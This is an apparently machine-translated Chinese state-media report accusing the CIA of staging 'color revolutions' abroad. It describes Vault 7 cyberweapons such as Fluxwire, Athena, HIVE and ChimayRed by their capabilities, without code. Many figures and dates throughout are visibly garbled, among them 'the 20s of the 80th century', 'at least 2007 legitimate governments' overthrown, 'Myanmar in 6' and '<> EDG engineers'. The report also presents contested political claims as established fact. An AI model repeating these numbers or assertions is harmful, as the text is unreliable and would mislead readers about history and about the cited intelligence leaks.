"The Matrix" investigation report - US Central Intelligence Agency (CIA) (one of)

The Central Intelligence Agency (CIA), a more well-known name than the National Security Agency (NSA), is one of the main intelligence agencies of the US federal government, headquartered in Langley, Virginia, USA, with four departments: Intelligence (DI), Secret Operations (NCS), Science and Technology (DS&T), and Support Service (DS). Its main business scope involves: collecting intelligence information on foreign governments, companies and citizens; Aggregate analysis and processing of intelligence information collected by other U.S. intelligence agencies; Provide national security intelligence and security risk assessment advice to senior U.S. decision-makers; Organize, implement, guide and supervise cross-border secret activities at the request of the President of the United States.

For a long time, the US Central Intelligence Agency (CIA) has secretly carried out "peaceful evolution" and "color revolutions" around the world, and continued to carry out espionage activities.

Since entering the 21st century, the rapid development of the Internet has provided new opportunities for the US Central Intelligence Agency (CIA) to infiltrate, subvert and disrupt sabotage activities, and institutions and individuals around the world who use US Internet equipment and software products have become puppet "agents" of the US Central Intelligence Agency (CIA), helping the agency quickly become a dazzling "star" in the cyber espionage war.

Starting from a large number of real cases investigated by 360 and the National Computer Virus Emergency Response Center, this series of reports reveals the main details of its cyber attack weapons, discloses the specific process of some typical cyber security cases in China and other countries, comprehensively and deeply analyzes the cyber attacks and related real-world harmful activities of the US Central Intelligence Agency (CIA), as well as its contribution to the United States becoming a "matrix", and provides reference and suggestions for cyber attack victims all over the world.

1. Overview

From the impact of the international socialist camp in the 20s of the 80th century, the drastic changes in the Soviet Union and Eastern Europe in the early 90s ("velvet revolution") to the "Rose Revolution" in Georgia in 2003, from the "Orange Revolution" in Ukraine in 2004 to the "Tulip Revolution" in Kyrgyzstan in 2005, from the "Arab Spring" in West Asia and North Africa in 2011 to the "Second Color Revolution" in Ukraine in 2014, and the "Sunflower Revolution" in Taiwan, China, etc., all have been recognized by international institutions and scholars around the world as led by US intelligence agencies A typical case of a "color revolution". In some other countries, there have been attempted "color revolutions", such as the "Snowflake Revolution" in Belarus in March 2005, the "Orange Storm" in Azerbaijan in June 3, the "Cedar Revolution" in Lebanon in 2005, the "Saffron Revolution" in Myanmar in 6, and the "Green Revolution" in Iran in 2005. If we count from the Cold War period, there are countless incidents of regime change with the color of "peaceful evolution" and "color revolutions". According to statistics, the CIA has overthrown or attempted to overthrow at least 2007 legitimate governments of other countries for decades (and the CIA has only recognized 2009 of them), causing unrest in the countries concerned.

Comprehensively analyzing the various technologies in the above incidents, information communication and on-site command have become the decisive factors affecting the success or failure of the incident. These technologies of the United States are in a leading position in the world, especially in the 20s of the 80th century, the United States promoted the Internet to the international and was generally accepted by all countries in the world, providing unprecedented technical possibilities for the US intelligence department to launch a "color revolution" abroad.

Former US Secretary of State Madeleine Albright once threatened: "With the Internet, we have a way for China." ”

This is true, many "color revolution" incidents have the shadow of Western powers using the Internet to promote the situation. After the "Arab Spring" incident in many countries in West Asia and North Africa, individual large Internet multinational enterprises in the United States actively intervened, invested a lot of human, material and financial resources to all parties to the conflict, wooed and supported the opposition, openly challenged the legitimate governments of other countries that did not match the interests of the United States, helped to spread false information, and promoted the continuous intensification of popular protests.

The first is to provide encrypted network communication services. To help protesters in parts of the Middle East stay connected while avoiding being tracked and arrested, U.S. companies (allegedly with U.S. military backgrounds) have developed an untraceable TOR technology (The Onion Router) that can access the Internet. The servers in question encrypt all the information that flows through them, helping specific users to surf the web anonymously. Launched by U.S. companies, the program was immediately offered free of charge to government rebels in Iran, Tunisia, Egypt and other countries, ensuring that "dissident youth who want to shake the rule of their own governments" can participate in activities that are protected from scrutiny and surveillance by local legitimate governments.

The second is to provide disconnected communication services. In order to ensure that anti-government personnel in Tunisia, Egypt and other countries can still keep in touch with the outside world even if they are disconnected, Google and Twitter quickly launched a special service called "Speak2Tweet", which allows users to dial and upload voice messages for free, which are automatically converted into tweets and then uploaded to the Internet, Twitter and other platforms are publicly released, completing real-time reporting of the scene of the incident.

The third is to provide on-site command tools for rallies and parades based on the Internet and wireless communications. The RAND Corporation of the United States spent years developing a non-traditional regime change technology known as "swarming" to help a large number of young people connected through the Internet join the mobile protests of "one shot for another place", greatly improving the efficiency of on-site command at events.

Fourth, the American company has developed a software called "riot", which supports 100% independent wireless broadband networks, provides variable Wi-Fi networks, does not rely on any traditional physical access methods, does not require telephone, cable or satellite connection, and can easily avoid any form of government monitoring. With the help of the above-mentioned powerful network technology and communication technology means, the US Central Intelligence Agency (CIA) has planned and organized a large number of "color revolution" events around the world.

Fifth, the U.S. State Department has made the development of a "counter-censorship" information system an important task, and has injected more than $3000 million into the project.

2. The CIA's family of cyberattack weapons

On March 2017, 3, the WikiLeaks website disclosed 7,8716 secret documents purportedly from the CIA's cyber intelligence center, involving the attack methods, code names of attack action items, and technical specifications and requirements for attack tools of the CIA hacker team.

In 2020, 360 independently discovered an APT organization that had never been exposed to the outside world, specializing in cyberattacks and stealing activities against China and its friendly countries, and the victims were all over the world, which we separately numbered APT-C-39. There is evidence that the group used cyber weapons tools (including Athena, Fluxwire, Grasshopper, AfterMidnight, HIVE, ChimayRed, etc.) linked to the exposed "Vault 7" data to carry out cyberattacks against targets in China and other countries, dating back to 7, and related attacks continue to this day. The targets include important information infrastructure, aerospace, scientific research institutions, petroleum and petrochemicals, large Internet companies and government agencies in various countries.

In a massive global cyberattack campaign, the CIA has made extensive use of "0day" vulnerabilities, including a large number of backdoors and vulnerabilities that have not yet been publicly disclosed (some of which have been verified), to build "botnet" networks and attack springboard networks around the world, and to carry out phased attack intrusion operations against network servers, network terminals, switches and routers, and a large number of industrial control equipment. In the cyber attacks that have been discovered specifically against targets in China, we have successfully extracted multiple samples of Vault 7 cyberattack weapons, and our partners in Southeast Asian countries and Europe have also extracted almost identical samples, including:

2.1 Fluxwire backdoor platform

A complex backdoor attack operation management platform that supports 9 mainstream operating systems such as Windows, Unix, Linux, and MacOS and 6 different network architectures, which can form many "broiler" nodes into a fully autonomous mesh network, supporting self-healing, cyclic attacks and multi-path routing.

2.2 Athena program

A lightweight backdoor for Microsoft's Windows operating system, developed by the CIA in partnership with Siege Technologies (acquired by Nehemiah Security in 2016), can be implanted as a Microsoft Windows service through remote installations, supply chain attacks, man-in-the-middle hijacking attacks, and physical contact installations. All attack function modules are decrypted in memory as plugins.

2.3 Grasshopper backdoor

An advanced configurable backdoor for Microsoft Windows operating system that can generate malicious loads in multiple file formats (EXE, DLL, SYS, PIC), supports multiple execution methods, and can be used with different plug-in modules to covertly reside and perform espionage functions.

2.4 AfterMidnight backdoors

A lightweight backdoor that runs as a DLL service for Microsoft's Windows operating system, dynamically transmits and loads "Gremlins" modules via HTTPS, and cryptographically executes malicious payloads throughout.

2.5 ChimayRed exploit tool

An exploit toolkit for routers of brands such as MikroTik, which can be implanted into lightweight network equipment such as "TinyShell" with exploits.

2.6 HIVE (Hive) Cyber Attack Platform

The "Hive" cyber attack platform is jointly developed by a department of the Central Intelligence Agency (CIA) and a company of Northrop Grumman (NOC), a well-known US military industrial enterprise, which provides the CIA cyber attack team with a complex and continuous attack method. It manages the use of a large number of lost assets around the world, forming multiple layers of dynamic springboards and secret data transmission channels, and uploading user accounts, passwords, and private data (https://www.cverc.org.cn/head/zhaiyao/news7-hive.htm) to the CIA 24/×20220419.

2.7 Other Derivatives

The CIA has also derived and used a large number of attack samples other than "Vault7" (Vault 7) data in the process of attacking and stealing secrets through the above-mentioned "Vault 7" cyber weapons, including disguised phishing software installation packages, keylogger components, system information collection components, USB file theft modules and different open source hacking tools.

3. Functional analysis of samples of US Central Intelligence Agency (CIA) cyberattack weapons

In the course of investigating a number of typical cyber attacks in China, 360 captured and successfully extracted a large number of Trojans, functional plug-ins and attack platform samples closely related to the CIA's "Vault7" data from the victim information network. In-depth analysis found that most of the relevant program samples followed the Network Operations Division In-memory Code Execution Specification, Network Operations Division Cryptographic Requirements and Network Operations in the "Vault 7" data Division Persisted DLL Specification and other CIA malware development standards and technical specifications. These standards and norms correspond to the loading and execution, data encryption and persistence of malicious code in cyber attack stealing activities, and the relevant cyber weapons have carried out extremely strict standardized, process-oriented and professional software engineering management. It is reported that only the Central Intelligence Agency (CIA) currently develops cyberattack weapons in strict compliance with these standards and norms.

According to the "Vault 7" (Dome 7) data, the above-mentioned cyber attack weapons belong to the EDG (Engineering Development Group) of the Central Intelligence Agency (CIA), and are independently or jointly developed by its AED (Application Engineering Department) and EDB (Embedded Device Division). Most of these cyberweapons were born in the CIA's top-secret internal network called the devlan.net. "devlan.net" is a huge cyber weapons development and testing infrastructure established by the Engineering Development Department (EDG) of the Central Intelligence Agency (CIA). According to the development log data of "devlan.net", at least <> EDG engineers have been invested in the research and development of the "HIVE" project alone.

Further technical analysis found that most of the CIA's backdoors and attack components operated in a memory-resident execution without physical files, which made it extremely difficult to discover and forensically collect relevant samples. Even so, the joint technical team managed to find an effective way to solve the forensic challenge. For the convenience of subsequent description and analysis of the problem, we will temporarily divide the CIA's attack weapons into 9 categories:

3.1 Framework Platform Classes. We found and captured Fluxwire, Grasshopper, and Athena attack samples and campaigns, and upon field testing, the functionality, attack characteristics, and network behavior of these samples corroborated with the descriptions in the Vault7 data.

3.2 Attack module delivery class. The CIA uses a large number of small, simple malicious code downloaders to load and execute more malicious code and modules, and the relevant samples have no special malicious functions and characteristics, but when combined with attack weapons such as framework platforms, they can show powerful stealing functions, which is extremely difficult to attribute.

3.3 Remote Control Classes. A number of remote control plug-ins have been extracted, most of which belong to the attack module components derived from the framework platform attack weapons, and the two cooperate with each other.

3.4 Lateral movement classes. The large number of malicious program samples extracted included several backdoors installed using Windows Remote Services through system administrator credentials. In addition, the US Central Intelligence Agency (CIA) also hijacked the upgrade program of the internal network of a variety of security products, and distributed and installed backdoors through the upgrade function of the internal network upgrade server to implement lateral movement attacks in the internal network.

3.5 Information Collection and Theft. The joint technical team accidentally extracted an information theft tool used by the CIA, which is one of the 48 advanced cyber weapons of the US National Security Agency (NSA) classified document ANT catalog, which is a dedicated information theft tool of the US National Security Agency (NSA). This situation indicates that the CIA and the National Security Agency (NSA) will jointly attack the same victim, or share cyberattack weapons with each other, or provide related technical or human support. This adds important new evidence to the attribution of the identity of the APT-C-39 attackers.

3.6 Exploit Classes. The investigation found that since at least 2015, the CIA has built up a huge springboard resource for cyberattacks around the world, using "zero-day" vulnerabilities to indiscriminately attack IoT (Internet of Things) devices and network servers worldwide, and turning a large number of compromised devices into springboard "broilers", or hiding their own attacks, or blaming cyberattacks on other countries. For example, the CIA uses a exploit kit codenamed "ChimayRed" to target multiple models of MikroTik brand routers, including network equipment that uses them heavily in China. During the attack, the US Central Intelligence Agency (CIA) will first maliciously modify the router startup script, so that the router will still execute the backdoor after restarting; Then, the CIA modifies the CGI program of the router to plug the vulnerabilities exploited by the CIA itself to prevent other attackers from intruding again and causing the loss of privilege; Eventually, the CIA will implant proprietary backdoors into routers such as "HIVE" or "TinyShell" that only the CIA can use.

3.7 Disguise normal software classes. The Central Intelligence Agency (CIA) customizes the backdoor to be an unpopular software installation package with a small number of users used by the target in response to the target's network environment, and carries out precise social engineering attacks against the target.

3.8 Security Software Attack and Defense Class. The U.S. Central Intelligence Agency (CIA) has attack tools specifically designed to attack commercial antivirus software, through which the process of remotely shutting down and killing designated antivirus software can be used to disable the attack or attack weapon of the relevant antivirus software against the CIA.

3.9 Third Party Open Source Tools. The CIA also often uses off-the-shelf open-source hacking tools for its attack campaigns. The initial attack of a CIA cyberattack campaign typically targets the victim's network device or server, as well as a social engineering attack. After obtaining the target permission, it will further explore the network topology of the target organization, and move laterally to other networked devices in the intranet to steal more sensitive information and data. The target computer controlled by the US Central Intelligence Agency (CIA) will be monitored in real time for 24 hours, all keyboard strokes of the victim will be recorded, clipboard copy and paste information will be stolen, the insertion status of USB devices (mainly mobile hard disks, U disks, etc.) will also be monitored in real time, once a USB device is accessed, the private files in the victim's USB device will be automatically stolen. When possible, the camera, microphone and GPS positioning device on the user terminal are remotely controlled and accessed.

4. Summary

The cyber hegemony manipulated by the United States originated in cyberspace, shrouded the world, and spread to the world, and as one of the three major intelligence collection agencies of the United States, the cyber attacks launched by the Central Intelligence Agency (CIA) against the world have long shown the characteristics of automation, systematization and intelligence. The 8716,<> documents leaked on the WikiLeaks website alone contain many important hacking tools and cyberattack weapons of the US intelligence services, indicating that the United States has built the world's largest cyber arsenal. Through empirical analysis, we found that its cyber weapons use extremely strict espionage technical specifications, various attack methods echo back and forth, interlocked, now covering almost all Internet and Internet of Things assets in the world, can control other countries' networks anytime, anywhere, steal other countries' important and sensitive data, and this undoubtedly requires a lot of financial, technical and human resources support, the United States-style cyber hegemony can be seen, "Matrix" is well deserved.

This series of reports attempts to expose the various activities of the US Central Intelligence Agency (CIA) against cyber targets in China, and initially explore these cyber attacks and data espionage activities.

In response to the highly systematic, intelligent and covert cyber attacks launched by the Central Intelligence Agency (CIA) against China, it is particularly important for domestic government agencies, scientific research institutions, industrial enterprises and commercial institutions to quickly "see" and "deal with" at the first time. In order to effectively respond to imminent cyber and real threats, while adopting independent and controllable domestic equipment, we should organize and carry out self-inspection and self-inspection of APT attacks as soon as possible, and gradually establish a long-term defense system to achieve comprehensive and systematic prevention and control and resist advanced threat attacks. (CCTV News Client)